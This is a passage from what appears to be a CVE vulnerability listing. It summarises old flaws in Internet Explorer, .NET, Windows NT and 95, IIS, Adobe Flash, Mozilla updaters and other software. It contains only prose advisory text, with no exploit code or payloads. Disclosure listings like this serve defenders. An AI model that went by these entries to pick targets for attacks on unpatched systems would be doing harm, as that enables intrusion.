OCX control that is not closed properly, aka the "OCX Attachment" vulnerability. [CVE-2000-0858] Vulnerability in Microsoft Windows NT 4.0 allows remote attackers to cause a denial of service in IIS by sending it a series of malformed requests which cause INETINFO.EXE to fail, aka the "Invalid URL" vulnerability. [CVE-2000-0849] Race condition in Microsoft Windows Media server allows remote attackers to cause a denial of service in the Windows Media Unicast Service via a malformed request, aka the "Unicast Service Race Condition" vulnerability. [CVE-2000-0790] The web-based folder display capability in Microsoft Internet Explorer 5.5 on Windows 98 allows local users to insert Trojan horse programs by modifying the Folder.htt file and using the InvokeVerb method in the ShellDefView ActiveX control to specify a default execute option for the first file that is listed in the folder. [CVE-2000-0771] Microsoft Windows 2000 allows local users to cause a denial of service by corrupting the local security policy via malformed RPC traffic, aka the "Local Security Policy Corruption" vulnerability. [CVE-2000-0742] The IPX protocol implementation in Microsoft Windows 95 and 98 allows remote attackers to cause a denial of service by sending a ping packet with a source IP address that is a broadcast address, aka the "Malformed IPX Ping Packet" vulnerability. [CVE-2000-0653] Microsoft Outlook Express allows remote attackers to monitor a user's email by creating a persistent browser link to the Outlook Express windows, aka the "Persistent Mail-Browser Link" vulnerability. [CVE-2000-0495] Microsoft Windows Media Encoder allows remote attackers to cause a denial of service via a malformed request, aka the "Malformed Windows Media Encoder Request" vulnerability. [CVE-2000-0331] Buffer overflow in Microsoft command processor (CMD.EXE) for Windows NT and Windows 2000 allows a local user to cause a denial of service via a long environment variable, aka the "Malformed Environment Variable" vulnerability. [CVE-2000-0228] Microsoft Windows Media License Manager allows remote attackers to cause a denial of service by sending a malformed request that causes the manager to halt, aka the "Malformed Media License Request" Vulnerability. [CVE-2000-0216] Microsoft email clients in Outlook, Exchange, and Windows Messaging automatically respond to Read Receipt and Delivery Receipt tags, which could allow an attacker to flood a mail system with responses by forging a Read Receipt request that is redirected to a large distribution list. [CVE-2000-0168] Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the "DOS Device in Path Name" vulnerability. [CVE-2000-0089] The rdisk utility in Microsoft Terminal Server Edition and Windows NT 4.0 stores registry hive information in a temporary file with permissions that allow local users to read it, aka the "RDISK Registry Enumeration File" vulnerability. [CVE-1999-1291] TCP/IP implementation in Microsoft Windows 95, Windows NT 4.0, and possibly others, allows remote attackers to reset connections by forcing a reset (RST) via a PSH ACK or other means, obtaining the target's last sequence number from the resulting packet, then spoofing a reset to the target. [CVE-1999-0749] Buffer overflow in Microsoft Telnet client in Windows 95 and Windows 98 via a malformed Telnet argument. [CVE-1999-0681] Buffer overflow in Microsoft FrontPage Server Extensions (PWS) 3.0.2.926 on Windows 95, and possibly other versions, allows remote attackers to cause a denial of service via a long URL. [CVE-1999-0386] Microsoft Personal Web Server and FrontPage Personal Web Server in some Windows systems allows a remote attacker to read files on the server by using a nonstandard URL. [CVE-1999-0288] The WINS server in Microsoft Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service (process termination) via invalid UDP frames to port 137 (NETBIOS Name Service), as demonstrated via a flood of random packets. [CVE-1999-0012] Some web servers under Microsoft Windows allow remote attackers to bypass access restrictions for files with long file names. [CVE-2013-5025] Unspecified vulnerability in an ActiveX control in the Help subsystem in National Instruments LabWindows/CVI before 2013 has unknown impact and remote attack vectors. [CVE-2013-5023] Unspecified vulnerability in an ActiveX control in the HelpAsst component in NI Help Links in National Instruments LabWindows/CVI, LabVIEW, and other products has unknown impact and remote attack vectors. [CVE-2013-5022] Absolute path traversal vulnerability in the 3D Graph ActiveX control in cw3dgrph.ocx in National Instruments LabWindows/CVI, LabVIEW, and other products allows remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method. [CVE-2013-5021] Multiple absolute path traversal vulnerabilities in National Instruments cwui.ocx, as used in National Instruments LabWindows/CVI, National Instruments LabVIEW, the Data Analysis component in ABB DataManager 1 through 6.3.6, and other products allow remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method in the (1) CWNumEdit, (2) CWGraph, (3) CWBoolean, (4) CWSlide, or (5) CWKnob ActiveX control, in conjunction with file content in the (a) Caption or (b) FormatString property value. [CVE-2013-4669] FortiClient before 4.3.5.472 on Windows, before 4.0.3.134 on Mac OS X, and before 4.0 on Android [CVE-2013-4015] Microsoft Internet Explorer 6 through 10 allows local users to bypass the elevation policy check in the (1) Protected Mode or (2) Enhanced Protected Mode protection mechanism, and consequently gain privileges, by leveraging the ability to execute sandboxed code. [CVE-2013-3956] The NICM.SYS kernel driver 3.1.11.0 in Novell Client 4.91 SP5 on Windows XP and Windows Server 2003 [CVE-2013-3697] Integer overflow in the NWFS.SYS kernel driver 4.91.5.8 in Novell Client 4.91 SP5 on Windows XP and Windows Server 2003 and the NCPL.SYS kernel driver in Novell Client 2 SP2 on Windows Vista and Windows Server 2008 and Novell Client 2 SP3 on Windows Server 2008 R2, Windows 7, Windows 8, and Windows Server 2012 might allow local users to gain privileges via a crafted 0x1439EB IOCTL call. [CVE-2013-3393] The Precision Video Engine component in Cisco Jabber for Windows and Cisco Virtualization Experience Media Engine allows remote attackers to cause a denial of service (process crash and call disconnection) via crafted RTP packets, aka Bug IDs CSCuh60706 and CSCue21117. [CVE-2013-3347] Integer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via PCM data that is not properly handled during resampling. [CVE-2013-3345] Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2013-3344] Heap-based buffer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via unspecified vectors. [CVE-2013-3343] Adobe Flash Player before 10.3.183.90 and 11.x before 11.7.700.224 on Windows, before 10.3.183.90 and 11.x before 11.7.700.225 on Mac OS X, before 10.3.183.90 and 11.x before 11.2.202.291 on Linux, before 11.1.111.59 on Android 2.x and 3.x, and before 11.1.115.63 on Android 4.x [CVE-2013-3335] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3334] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3333] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3332] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3331] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3330] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3329] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3328] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3327] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3326] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3325] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3324] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3178] Microsoft Silverlight 5 before 5.1.20513.0 does not properly initialize arrays, which allows remote attackers to execute arbitrary code or cause a denial of service (NULL pointer dereference) via a crafted Silverlight application, aka "Null Pointer Vulnerability." [CVE-2013-3171] The serialization functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly check the permissions of delegate objects, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a partial-trust relationship, aka "Delegate Serialization Vulnerability." [CVE-2013-3166] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to inject arbitrary web script or HTML via vectors involving incorrect auto-selection of the Shift JIS encoding, leading to cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability," a different vulnerability than CVE-2013-0015. [CVE-2013-3164] Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3163] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3151. [CVE-2013-3162] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3115. [CVE-2013-3161] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3143. [CVE-2013-3153] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3148. [CVE-2013-3152] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3146. [CVE-2013-3151] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3163. [CVE-2013-3150] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3145. [CVE-2013-3149] Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3148] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3153. [CVE-2013-3147] Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3146] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3152. [CVE-2013-3145] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3150. [CVE-2013-3144] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3151 and CVE-2013-3163. [CVE-2013-3143] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3161. [CVE-2013-3142] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3139. [CVE-2013-3141] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3110. [CVE-2013-3139] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3142. [CVE-2013-3134] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 on 64-bit platforms does not properly allocate arrays of structures, which allows remote attackers to execute arbitrary code via a crafted .NET Framework application that changes array data, aka "Array Allocation Vulnerability." [CVE-2013-3133] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check the permissions of objects that use reflection, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Anonymous Method Injection Vulnerability." [CVE-2013-3132] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check the permissions of objects that use reflection, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Delegate Reflection Bypass Vulnerability." [CVE-2013-3131] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5, and Silverlight 5 before 5.1.20513.0, does not properly prevent changes to data in multidimensional arrays of structures, which allows remote attackers to execute arbitrary code via (1) a crafted .NET Framework application or (2) a crafted Silverlight application, aka "Array Access Violation Vulnerability." [CVE-2013-3129] Microsoft .NET Framework 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 [CVE-2013-3126] Microsoft Internet Explorer 9 and 10, when script debugging is enabled, does not properly handle objects in memory during the processing of script, which allows remote attackers to execute arbitrary code via a crafted web site, aka "Internet Explorer Script Debug Vulnerability." [CVE-2013-3125] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3120. [CVE-2013-3124] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3122. [CVE-2013-3123] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3111. [CVE-2013-3122] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3124. [CVE-2013-3121] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3120] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3125. [CVE-2013-3119] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3114. [CVE-2013-3118] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3120 and CVE-2013-3125. [CVE-2013-3117] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3122 and CVE-2013-3124. [CVE-2013-3116] Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3115] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3162. [CVE-2013-3114] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3119. [CVE-2013-3113] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3112] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3113, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3111] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3123. [CVE-2013-3110] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3141. [CVE-2013-3028] Multiple buffer overflows in mqm programs in IBM WebSphere MQ 7.0.x before 7.0.1.11, 7.1.x before 7.1.0.3, and 7.5.x before 7.5.0.2 on non-Windows platforms allow local users to gain privileges via unspecified vectors. [CVE-2013-2977] Integer overflow in IBM Notes 8.5.x before 8.5.3 FP4 Interim Fix 1 and 9.x before 9.0 Interim Fix 1 on Windows, and 8.5.x before 8.5.3 FP5 and 9.x before 9.0.1 on Linux, allows remote attackers to execute arbitrary code via a malformed PNG image in a previewed e-mail message, aka SPR NPEI96K82Q. [CVE-2013-2874] Google Chrome before 28.0.1500.71 on Windows, when an Nvidia GPU is used, allows remote attackers to bypass intended restrictions on access to screen data via vectors involving IPC transmission of GL textures. [CVE-2013-2867] Google Chrome before 28.0.1500.71 does not properly prevent pop-under windows, which allows remote attackers to have an unspecified impact via a crafted web site. [CVE-2013-2854] Google Chrome before 27.0.1453.110 on Windows provides an incorrect handle to a renderer process in unspecified circumstances, which allows remote attackers to cause a denial of service or possibly have other impact via unknown vectors. [CVE-2013-2728] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-2557] The sandbox protection mechanism in Microsoft Internet Explorer 9 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2555] Integer overflow in Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-2551] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-1309. [CVE-2013-2496] The msrle_decode_8_16_24_32 function in msrledec.c in libavcodec in FFmpeg through 1.1.3 does not properly determine certain end pointers, which allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted Microsoft RLE data. [CVE-2013-2492] Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information. [CVE-2013-2451] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Networking. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to improper enforcement of exclusive port binds when running on Windows, which allows attackers to bind to ports that are already in use. [CVE-2013-2310] SoftBank Wi-Fi Spot Configuration Software, as used on SoftBank SHARP 3G handsets, SoftBank Panasonic 3G handsets, SoftBank NEC 3G handsets, SoftBank Samsung 3G handsets, SoftBank mobile Wi-Fi routers, SoftBank Android smartphones with the Wi-Fi application before 1.7.1, SoftBank Windows Mobile smartphones with the WISPrClient application before 1.3.1, SoftBank Disney Mobile Android smartphones with the Wi-Fi application before 1.7.1, and WILLCOM Android smartphones with the Wi-Fi application before 1.7.1, does not properly connect to access points, which allows remote attackers to obtain sensitive information by leveraging access to an 802.11 network. [CVE-2013-2306] The jigbrowser+ application before 1.6.4 for Android does not properly open windows, which allows remote attackers to spoof the address bar via a crafted web site. [CVE-2013-2303] Sleipnir 4.0.0.4000 and earlier on Windows allows remote attackers to spoof the SSL lock icon and address-bar colors via unspecified vectors. [CVE-2013-2268] Unspecified vulnerability in the MathML implementation in WebKit in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, has unknown impact and remote attack vectors, related to a "high severity security issue." [CVE-2013-1715] Multiple untrusted search path vulnerabilities in the (1) full installer and (2) stub installer in Mozilla Firefox before 23.0 on Windows allow local users to gain privileges via a Trojan horse DLL in the default downloads directory. NOTE: this issue exists because of an incomplete fix for CVE-2012-4206. [CVE-2013-1712] Multiple untrusted search path vulnerabilities in updater.exe in Mozilla Updater in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird before 17.0.8, and Thunderbird ESR 17.x before 17.0.8 on Windows 7, Windows Server 2008 R2, Windows 8, and Windows Server 2012 allow local users to gain privileges via a Trojan horse DLL in (1) the update directory or (2) the current working directory. [CVE-2013-1700] The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location. [CVE-2013-1673] The Mozilla Updater in Mozilla Firefox before 21.0 on Windows does not properly maintain Mozilla Maintenance Service registry entries in certain situations involving upgrades from older Firefox versions, which allows local users to gain privileges by leveraging write access to a "trusted path." [CVE-2013-1672] The Mozilla Maintenance Service in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 on Windows allows local users to bypass integrity verification and gain privileges via vectors involving junctions. [CVE-2013-1610] Unquoted Windows search path vulnerability in RDDService in Symantec PGP Desktop 10.0.x through 10.2.x and Symantec Encryption Desktop 10.3.0 before MP3 allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory. [CVE-2013-1609] Multiple unquoted Windows search path vulnerabilities in the (1) File Collector and (2) File PlaceHolder services in Symantec Enterprise Vault (EV) for File System Archiving before 9.0.4 and 10.x before 10.0.1 allow local users to gain privileges via a Trojan horse program. [CVE-2013-1489] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 10 and Update 11, when running on Windows using Internet Explorer, Firefox, Opera, and Google Chrome, allows remote attackers to bypass the "Very High" security level of the Java Control Panel and execute unsigned Java code without prompting the user via unknown vectors, aka "Issue 53" and the "Java Security Slider" vulnerability. [CVE-2013-1451] Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not ensure that the SSL lock icon is consistent with the Address bar, which makes it easier for remote attackers to spoof web sites via a crafted HTML document that triggers many HTTPS requests to an arbitrary host, followed by an HTTPS request to a trusted host and then an HTTP request to an untrusted host, a related issue to CVE-2013-1450. [CVE-2013-1450] Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd. [CVE-2013-1406] The Virtual Machine Communication Interface (VMCI) implementation in vmci.sys in VMware Workstation 8.x before 8.0.5 and 9.x before 9.0.1 on Windows, VMware Fusion 4.1 before 4.1.4 and 5.0 before 5.0.2, VMware View 4.x before 4.6.2 and 5.x before 5.1.2 on Windows, VMware ESXi 4.0 through 5.1, and VMware ESX 4.0 and 4.1 does not properly restrict memory allocation by control code, which allows local users to gain privileges via unspecified vectors. [CVE-2013-1380] Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-1379] Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-1378] Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-1375] Heap-based buffer overflow in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-1374] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1373] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1372] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1371] Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-1370] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1369] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x 